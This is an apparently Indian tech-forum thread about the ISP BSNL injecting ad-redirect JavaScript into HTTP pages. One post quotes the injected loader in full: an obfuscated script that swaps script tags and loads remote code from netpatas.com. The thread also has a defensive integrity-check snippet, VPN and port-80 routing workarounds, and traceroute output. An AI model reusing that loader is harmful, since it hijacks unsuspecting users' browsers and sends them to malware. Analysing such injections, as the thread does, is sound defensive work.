BSNL is inserting ads in websites, sending their users to malware sites through malware code injection

@Nishant Hi! - How are you doing the load balancing between service providers? What equipment is involved? Thanks :)

I am using an Edgerouter X for this.
 
Hi, this issue is still happening. I did not know that it is caused by the ISP until I read this forum. I also observed that it is not just related to all http requests; it just happens on some specific sites. They insert a javascript file within your page which then causes the redirection to ads on click events.

Here is what they are using:
Code:
!function() {
    var a = "/js/jquery-3.2.1.min.js"
      , r = null
      , e = document.getElementsByTagName("script")
      , i = e.length
      , n = null
      , t = Date.now()
      , s = null
      , o = 0;
    for ("/" === a.substring(0, 1) && (a = a.substring(1)),
    o = 0; o < i; o += 1)
        if (void 0 !== e[o].src && null !== e[o].src && e[o].src.indexOf(a) > -1) {
            n = o,
            r = e[o];
            break
        }
    void 0 !== r && null !== r || (r = document.getElementsByTagName("script")[0]),
    s = r.src.indexOf("?") > -1 ? r.src + "&cb=" + t.toString() + "&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag" : r.src + "?cb=" + t.toString() + "&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";
    try {
        if (void 0 === window.sarazasarazaNoti || null === window.sarazasarazaNoti || window.sarazasarazaNoti === Array && window.sarazasarazaNoti.indexOf(r.src) < 0) {
            void 0 !== window.sarazasarazaNoti && null !== window.sarazasarazaNoti || (window.sarazasarazaNoti = new Array),
            window.sarazasarazaNoti.push(r.src);
            var c = r.parentNode
              , d = r;
            if (r.async || r.defer || null !== n && n !== e.length - 1) {
                var w = document.createElement("script");
                w.src = s,
                c.replaceChild(w, d)
            } else
                document.write("<script type='text/javascript' src=" + s + "><\/script>"),
                c.removeChild(d)
        }
    } catch (a) {}
}();
document.addEventListener('DOMContentLoaded', function() {
    var esp = document.createElement('span');
    var esr = document.createElement('script');
    esr.src = 'http://netpatas.com/apu.php?zoneid=1812939&ndn=m2';
    esr.type = 'text/javascript';
    esp.appendChild(esr);
    document.body.appendChild(esp);
}, false);
I tried accessing other random sites with http and I did not see this problem there. So, I want to be sure that this is not happening because the hosted server is compromised. Do they have specific sites in their list to attack this way?

If they are targeting a specific site, let's say Example Domain, does that mean that if I access example.com from any other BSNL connection, I will still see ads on this site?

I want to stop this completely. What action should I take? Please guide.
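
One way to tell in-transit tampering from a compromised origin server, as an added example that is not part of the post above: compare the script body received over plain HTTP against a digest of the same file obtained over a path the ISP cannot modify (HTTPS or a VPN), then look for the literal markers of the loader quoted in the post. The function names, the sample strings and the host `ads.example.net` are constructed for illustration.

```javascript
const crypto = require("crypto");

// Subresource-Integrity style digest of a response body.
function sriHash(body) {
  return "sha256-" + crypto.createHash("sha256").update(body, "utf8").digest("base64");
}

// Literal strings that appear in the injected loader quoted in the post.
const MARKERS = ["sarazasarazaNoti", "&fingerprint=", "onIframeFlag"];

// Hosts of absolute URLs assigned with `.src = '...'` that differ from the page's own host.
function foreignScriptHosts(body, pageHost) {
  const hosts = new Set();
  const re = /\.src\s*=\s*["'](https?:\/\/[^"']+)["']/g;
  for (const m of body.matchAll(re)) {
    try {
      const host = new URL(m[1]).hostname;
      if (host !== pageHost) hosts.add(host);
    } catch (e) {
      // Not a parseable URL: ignore it.
    }
  }
  return [...hosts].sort();
}

// knownGoodSri: digest of the same file fetched over HTTPS or a VPN (assumption:
// the site serves the same file on both paths).
function inspectScript(body, knownGoodSri, pageHost) {
  return {
    integrityOk: sriHash(body) === knownGoodSri,
    markers: MARKERS.filter((m) => body.includes(m)),
    foreignHosts: foreignScriptHosts(body, pageHost),
  };
}

// Constructed samples: a stand-in for the real library, and a shortened
// imitation of the injected loader's shape.
const CLEAN = "/*! constructed stand-in for jquery */ window.jQuery = function () {};";
const TAMPERED = [
  's = r.src + "?cb=" + t.toString() + "&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";',
  "window.sarazasarazaNoti = new Array;",
  "var esr = document.createElement('script');",
  "esr.src = 'http://ads.example.net/apu.php?zoneid=0';",
].join("\n");

console.log(inspectScript(CLEAN, sriHash(CLEAN), "example.com"));
console.log(inspectScript(TAMPERED, sriHash(CLEAN), "example.com"));
```

If the digest matches over HTTPS or a VPN but not over the plain HTTP path, the modification is happening in transit rather than on the hosting server.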
 
Any resolution on this issue from you all here? BSNL is non-responsive on this topic. The problem feels more acute of late, where every other click is popping up a new adware tab for me on http sites.

Any recommendations please to avoid this?
 
Every recommendation comes with a disadvantage. For me, an always-on free VPN (Proton or Cloudflare) worked. VPN slows down the overall browsing experience considerably.
 
I don't think this is possible on OpenVPN itself but if you have a router level VPN, you can pass only port 80 through VPN and have rest of the ports like 443 go over normally. I haven't tried it myself and I don't know if it'll create issues though.

This'll only work if a web server/website has http hosted on port 80 (most sites do but some may not).
 


@pothi Since you have Mikrotik, what you can do to completely get rid of http injection is to:

1. Set up a PPTP VPN on the router

2. Create a mangle rule with a specific routing mark with dst port 80

3. Route that routing mark through VPN




Idk if BSNL does injections on port 80 or http in general though but this does seem to work and https is completely uninterrupted.

mtr 1.1.1.1 (ICMP, without mangle rule)
Code:
 Host                                                                        Loss%   Snt   Last   Avg  Best  Wrst StDev
1. DESKTOP-L8K59D2.mshome.net                                                0.0%     6    0.2   0.5   0.2   0.7   0.2
2. 192.168.5.1                                                               0.0%     6    1.9   1.8   1.7   2.0   0.1
3. dhcp.tripleplay.in                                                        0.0%     6   33.2   8.6   2.7  33.2  12.1
4. 103.240.232.113                                                          66.7%     6    4.3   7.8   4.3  11.3   4.9
5. core-router.static.tripleplay.in                                          0.0%     5    7.6   4.5   3.1   7.6   1.9
6. nsg-static-073.92.72.182.airtel.in                                        0.0%     5    3.6   7.5   3.6  16.3   5.1
7. 116.119.49.159                                                            0.0%     5   26.9   9.2   4.0  26.9   9.9
8. 182.79.161.213                                                            0.0%     5    4.8   4.6   3.8   5.5   0.6
9. 1.1.1.1                                                                   0.0%     5    4.7   4.3   3.8   4.7   0.4

mtr -P 80 -T 1.1.1.1 (without mangle rule)

Code:
 Host                                                                        Loss%   Snt   Last   Avg  Best  Wrst StDev
1. DESKTOP-L8K59D2.mshome.net                                                0.0%    10    0.8   0.7   0.4   0.8   0.1
2. 192.168.5.1                                                               0.0%    10    1.9   2.2   1.2   4.1   0.8
3. (waiting for reply)
4. (waiting for reply)
5. 103.240.232.42                                                            0.0%     9    2.5   3.3   2.5   5.5   0.9
6. (waiting for reply)
7. (waiting for reply)
8. (waiting for reply)
9. (waiting for reply)
10. 182.79.161.213                                                            0.0%     9    4.6   5.2   3.8  12.1   2.6
11. one.one.one.one                                                           0.0%     9    4.7 117.3   4.1 1011. 335.4

mtr 1.1.1.1 (ICMP, with mangle rule enabled for port 80)

Code:
 Host                                                                        Loss%   Snt   Last   Avg  Best  Wrst StDev
1. DESKTOP-L8K59D2.mshome.net                                                0.0%     3    0.4   0.5   0.4   0.6   0.1
2. 192.168.5.1                                                               0.0%     3    1.1   2.2   1.1   3.1   1.0
3. dhcp.tripleplay.in                                                        0.0%     3   51.9  44.8   6.4  75.9  35.3
4. (waiting for reply)
5. core-router.static.tripleplay.in                                          0.0%     3    3.6  15.1   3.6  23.6  10.3
6. nsg-static-073.92.72.182.airtel.in                                        0.0%     3    4.3   4.3   4.3   4.4   0.1
7. 116.119.49.159                                                            0.0%     3    5.4   5.1   5.0   5.4   0.2
8. 182.79.161.213                                                            0.0%     3    3.7   3.6   3.3   3.7   0.2
9. 1.1.1.1                                                                   0.0%     3    5.4   4.5   3.9   5.4   0.8

mtr -P 80 -T 1.1.1.1 (with mangle rule enabled):

Code:
 Host                                                                        Loss%   Snt   Last   Avg  Best  Wrst StDev
1. DESKTOP-L8K59D2.mshome.net                                                0.0%     8    0.8   0.7   0.3   0.9   0.2
2. 192.168.5.1                                                               0.0%     8    3.2   1.7   1.0   3.2   0.8
3. 10.1.1.1                                                                  0.0%     8   86.2  80.8  74.8  86.2   4.0
4. (waiting for reply)
5. (waiting for reply)
6. (waiting for reply)
7. (waiting for reply)
8. (waiting for reply)
9. (waiting for reply)
10. (waiting for reply)
11. one.one.one.one                                                           0.0%     7   90.1  83.2  76.7  90.1   4.8

Update:

For PFSense you can do it even easier:
1. Set up OpenVPN Client VPN on your browser. You can use any VPN provider which provides OpenVPN, such as Nord, PIA, ExpressVPN, Mullvad, Surfshark. Make sure you have the NAT rules set up as well.
2. Add a firewall rule at Firewall>Rules>LAN
3. Make sure that
Protocol : TCP
Source: LAN Net
Destination Port Range: HTTP (80)

4. Click on "Show Advanced"
5. Scroll down to "Gateway"
6. Set the gateway to your VPN
7. Click on Save button at bottom and then on "Apply Changes"
Now all your unencrypted http traffic will go over the VPN
 
I took this issue up with the local BSNL NOC guys in my town before the re-lockdown.

The guy claimed helplessness and asked me to send a mail to him detailing the sites that
were a part of the redirect in http usage. Needless to say I didn't send them any mail
and ended up surrendering the broadband connection while retaining the landline number.
Moved over to the cheapest plan for 129/- per month.

Switched over to a local 50 MBPS FTTH connection. Should have ditched them a long time ago.
 
